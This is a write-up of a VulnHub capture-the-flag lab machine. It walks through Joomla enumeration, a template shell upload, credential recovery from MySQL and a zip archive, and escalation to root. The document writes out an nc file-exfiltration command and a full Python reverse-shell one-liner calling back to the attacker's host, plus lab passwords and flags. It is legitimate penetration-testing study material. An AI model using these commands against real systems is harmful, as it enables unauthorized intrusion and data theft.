vulnhub-3-simple - My-oscp-all-things

System IP ： 192.168.1.56 ### Summary **1- Overview** **2- Enumeration** 2.1- Nmap Scan 2.2- Web Site Discovery 2.3- Active Directory Enumeration **3- Privilege Escalation** 3.1- Post-Compromise Enumeration 3.2- New Account Enumeration 3.3- Post-Compromise Exploitation ## 1- Overview ```text ``` ## 2- Port Enumeration** ### 2.1-Service Enumeration **Using autoNmap for scanning：** ``` /mnt/nmapAutomator/nmapAutomator.sh -o ./ -t all 192.168.1.56 ``` **The nmap results are as follows:** ``` PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:78:43:07 (VMware) ``` **Using rustscan for scanning：** ``` rustscan -u 5000 -- -A -a ip ``` **The rustscan results are as follows:** ``` ``` ### 2.2-Web Server Enumeration #### nikto ``` ``` results: ``` ``` #### gobuster ``` gobuster dir -u http://192.168.1.56/joomla/ -w /usr/share/SecLists/Discovery/Web-Content/common.txt -k -x php,txt -r -e ``` results: ``` http://192.168.1.56/joomla/LICENSE.txt (Status: 200) [Size: 18092] http://192.168.1.56/joomla/README.txt (Status: 200) [Size: 4874] http://192.168.1.56/joomla/administrator (Status: 200) [Size: 4923] http://192.168.1.56/joomla/index.php (Status: 200) [Size: 10007] http://192.168.1.56/joomla/index.php (Status: 200) [Size: 10007] http://192.168.1.56/joomla/robots.txt (Status: 200) [Size: 836] http://192.168.1.56/joomla/robots.txt (Status: 200) [Size: 836] http://192.168.1.56/joomla/web.config.txt (Status: 200) [Size: 1690] ``` ### userlist ``` http://192.168.124.65//how_to.txt Rob ``` ### information get ``` http://192.168.124.65/joomla/README.txt Joomla! 3.7 version ``` ## 3-Establish a foothold ``` cewl http://192.168.124.65/joomla -m 5 --with-numbers > html_80.dict joomla : Gotham to login admin pancel upload shell from templates error.php ``` http://192.168.124.65/joomla/templates/beez3/error.php ![[Pasted image 20220326170136.png]] ![[Pasted image 20220326170318.png]] ## 4- Privilege Escalation ### to rob configuration.php ``` mysql -> joomla : babyjoker ``` show databases; use batjoke; select * from taskforce; ``` 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== -> baneishere | | 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= ->aaronishere | 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== -> carnageishere | | 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= ->busterishereff | | 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ -> ???AllIHaveAreNegativeThoughts???| | 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= -> auntis the fuck here ``` so the password is ``` rob ???AllIHaveAreNegativeThoughts??? ``` ![[Pasted image 20220326171903.png]] ``` user.txt is : JKR[f5bb11acbb957915e421d62e7253d27a] ``` ![[Pasted image 20220326171932.png]] ### to Abner cat Abnerineedyourhelp and rot13 decryto it abner : I33hope99my0death000makes44more8cents00than0my0life0 ![[Pasted image 20220326172251.png]] ![[Pasted image 20220326172406.png]] ``` user2.txt : JKR{0286c47edc9bfdaf643f5976a8cfbd8d} ``` ### to penguin ![[Pasted image 20220326173300.png]] ![[Pasted image 20220326173244.png]] ``` nc -lvvp 12345 > dear.zip // on kali nc 192.168.124.5 12345 < .dear_penguins.zip // on machine zip2john fail and try the abner'pass : _I33hope99my0death000makes44more8cents00than0my0life0_ ``` ``` My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!! scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz ``` ``` penguin : scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz ``` ![[Pasted image 20220326174856.png]] ``` user3.txt : JKR{284a3753ec11a592ee34098b8cb43d52} ``` ![[Pasted image 20220326175236.png]] ``` Hey Penguin, I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder. Joker ``` i run pspy64 to check it ![[Pasted image 20220326175431.png]] ![[Pasted image 20220326175505.png]] ``` cat > .trash_old content : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.124.5",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` root.txt :JKR{68028b11a1b7d56c521a90fc18252995} ``` ``` ![[Pasted image 20220326180802.png]]